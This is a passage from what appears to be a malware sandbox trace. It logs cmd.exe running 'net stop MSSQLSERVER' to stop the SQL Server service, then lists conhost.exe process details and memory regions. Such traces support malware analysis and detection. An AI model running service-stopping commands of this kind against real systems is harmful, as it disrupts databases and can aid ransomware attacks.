lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0x40, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x1, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0x1, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x0, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x9, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x9, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0x9, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegCloseKey (hKey=0x94) returned 0x0 [0127.845] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29830 [0127.845] srand (_Seed=0x5ad29830) [0127.845] GetCommandLineW () returned="/c net stop MSSQLSERVER" [0127.845] GetCommandLineW () returned="/c net stop MSSQLSERVER" [0127.845] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.845] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4839cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.845] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.845] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.845] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.845] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.845] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.845] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.845] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.845] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.845] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.845] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.846] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.846] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.846] GetEnvironmentStringsW () returned 0x4837d60* [0127.846] FreeEnvironmentStringsA (penv="A") returned 1 [0127.846] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.846] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.846] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.846] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.846] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.846] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.846] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.846] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.846] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.846] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.846] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x450fb04 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.846] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x450fb04, lpFilePart=0x450fafc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450fafc*="Desktop") returned 0x1d [0127.846] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.846] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x450f880 | out: lpFindFileData=0x450f880) returned 0x48305c8 [0127.846] FindClose (in: hFindFile=0x48305c8 | out: hFindFile=0x48305c8) returned 1 [0127.847] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x450f880 | out: lpFindFileData=0x450f880) returned 0x48305c8 [0127.847] FindClose (in: hFindFile=0x48305c8 | out: hFindFile=0x48305c8) returned 1 [0127.847] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0127.847] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x450f880 | out: lpFindFileData=0x450f880) returned 0x48305c8 [0127.847] FindClose (in: hFindFile=0x48305c8 | out: hFindFile=0x48305c8) returned 1 [0127.847] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.847] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0127.847] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0127.847] GetEnvironmentStringsW () returned 0x4837d60* [0127.847] FreeEnvironmentStringsA (penv="=") returned 1 [0127.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.847] GetConsoleOutputCP () returned 0x1b5 [0127.848] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.848] GetUserDefaultLCID () returned 0x409 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x450fc34, cchData=128 | out: lpLCData="0") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x450fc34, cchData=128 | out: lpLCData="0") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x450fc34, cchData=128 | out: lpLCData="1") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0127.848] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0127.848] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.849] GetConsoleTitleW (in: lpConsoleTitle=0x483a9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.849] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.849] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0127.849] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0127.849] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0127.849] _wcsicmp (_String1="net", _String2=")") returned 69 [0127.850] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0127.850] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0127.850] _wcsicmp (_String1="IF", _String2="net") returned -5 [0127.850] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0127.850] _wcsicmp (_String1="REM", _String2="net") returned 4 [0127.850] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0127.850] GetConsoleTitleW (in: lpConsoleTitle=0x450f920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.851] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0127.851] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0127.851] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="CD") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0127.851] _wcsicmp (_String1="net", _String2="REN") returned -4 [0127.851] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0127.851] _wcsicmp (_String1="net", _String2="SET") returned -5 [0127.851] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0127.851] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0127.851] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0127.851] _wcsicmp (_String1="net", _String2="MD") returned 1 [0127.851] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0127.851] _wcsicmp (_String1="net", _String2="RD") returned -4 [0127.851] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0127.851] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0127.851] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0127.851] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0127.851] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0127.851] _wcsicmp (_String1="net", _String2="VER") returned -8 [0127.851] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0127.851] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0127.851] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0127.851] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0127.851] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0127.851] _wcsicmp (_String1="net", _String2="START") returned -5 [0127.851] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0127.851] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0127.851] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0127.851] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0127.851] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0127.851] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0127.851] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0127.851] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0127.851] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0127.851] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0127.851] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0127.851] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="CD") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0127.851] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0127.851] _wcsicmp (_String1="net", _String2="REN") returned -4 [0127.852] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0127.852] _wcsicmp (_String1="net", _String2="SET") returned -5 [0127.852] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0127.852] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0127.852] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0127.852] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0127.852] _wcsicmp (_String1="net", _String2="MD") returned 1 [0127.852] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0127.852] _wcsicmp (_String1="net", _String2="RD") returned -4 [0127.852] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0127.852] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0127.852] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0127.852] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0127.852] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0127.852] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0127.852] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0127.852] _wcsicmp (_String1="net", _String2="VER") returned -8 [0127.852] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0127.852] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0127.852] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0127.852] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0127.852] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0127.852] _wcsicmp (_String1="net", _String2="START") returned -5 [0127.852] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0127.852] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0127.852] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0127.852] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0127.852] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0127.852] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0127.852] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0127.852] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0127.852] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0127.852] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0127.852] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0127.852] _wcsicmp (_String1="net", _String2="IF") returned 5 [0127.852] _wcsicmp (_String1="net", _String2="REM") returned -4 [0127.852] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0127.852] SetErrorMode (uMode=0x0) returned 0x0 [0127.852] SetErrorMode (uMode=0x1) returned 0x0 [0127.852] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x48305d0, lpFilePart=0x450f42c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450f42c*="Desktop") returned 0x1d [0127.853] SetErrorMode (uMode=0x0) returned 0x1 [0127.853] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.853] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.860] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.860] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.860] GetConsoleTitleW (in: lpConsoleTitle=0x450f6ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.860] InitializeProcThreadAttributeList (in: lpAttributeList=0x450f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x450f5bc | out: lpAttributeList=0x450f5d8, lpSize=0x450f5bc) returned 1 [0127.860] UpdateProcThreadAttribute (in: lpAttributeList=0x450f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x450f5c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x450f5d8, lpPreviousValue=0x0) returned 1 [0127.860] GetStartupInfoW (in: lpStartupInfo=0x450f610 | out: lpStartupInfo=0x450f610*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.861] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.861] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.862] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLSERVER", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x450f560*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLSERVER", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x450f5ac | out: lpCommandLine="net stop MSSQLSERVER", lpProcessInformation=0x450f5ac*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe0c, dwThreadId=0xe08)) returned 1 [0127.868] CloseHandle (hObject=0xa4) returned 1 [0127.868] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.868] GetEnvironmentStringsW () returned 0x4839ec8* [0127.868] FreeEnvironmentStringsA (penv="=") returned 1 [0127.868] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0127.988] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x450f544 | out: lpExitCode=0x450f544*=0x2) returned 1 [0127.988] CloseHandle (hObject=0xa8) returned 1 [0127.988] _vsnwprintf (in: _Buffer=0x450f62c, _BufferCount=0x13, _Format="%08X", _ArgList=0x450f54c | out: _Buffer="00000002") returned 8 [0127.988] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0127.988] GetEnvironmentStringsW () returned 0x483b3a8* [0127.988] FreeEnvironmentStringsA (penv="=") returned 1 [0127.988] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.988] GetEnvironmentStringsW () returned 0x483b3a8* [0127.988] FreeEnvironmentStringsA (penv="=") returned 1 [0127.989] DeleteProcThreadAttributeList (in: lpAttributeList=0x450f5d8 | out: lpAttributeList=0x450f5d8) [0127.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.989] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.989] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.989] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.989] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.989] SetConsoleInputExeNameW () returned 0x1 [0127.989] GetConsoleOutputCP () returned 0x1b5 [0127.989] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.989] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.989] exit (_Code=2) Thread: id = 388 os_tid = 0xdfc Process: id = "99" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x24a3d000" os_pid = "0x340" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0xd18" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6033 start_va = 0x7fe4a000 end_va = 0x7fe4afff entry_point = 0x0 region_type = private name = "private_0x000000007fe4a000" filename = "" Region: id = 6034 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6035 start_va = 0x8a52260000 end_va = 0x8a5227ffff entry_point = 0x0 region_type = private name = "private_0x0000008a52260000" filename = "" Region: id = 6036 start_va = 0x8a52280000 end_va = 0x8a52293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a52280000" filename = "" Region: id = 6037 start_va = 0x8a522a0000 end_va = 0x8a522dffff entry_point = 0x0 region_type = private name = "private_0x0000008a522a0000" filename = "" Region: id = 6038 start_va = 0x7df5fff50000 end_va = 0x7ff5fff4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff50000" filename = "" Region: id = 6039 start_va = 0x7ff6c4470000 end_va = 0x7ff6c4492fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4470000" filename = "" Region: id = 6040 start_va = 0x7ff6c449d000 end_va = 0x7ff6c449efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c449d000" filename = "" Region: id = 6041 start_va = 0x7ff6c449f000 end_va = 0x7ff6c449ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c449f000" filename = "" Region: id = 6042 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6043 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6044 start_va = 0x8a52260000 end_va = 0x8a5226ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a52260000" filename = "" Region: id = 6045 start_va = 0x8a52270000 end_va = 0x8a52276fff entry_point = 0x0 region_type = private name = "private_0x0000008a52270000" filename = "" Region: id = 6046 start_va = 0x8a522e0000 end_va = 0x8a5231ffff entry_point = 0x0 region_type = private name = "private_0x0000008a522e0000" filename = "" Region: id = 6047 start_va = 0x8a52320000 end_va = 0x8a5241ffff entry_point = 0x0 region_type = private name = "private_0x0000008a52320000" filename = "" Region: id = 6048 start_va = 0x8a52420000 end_va = 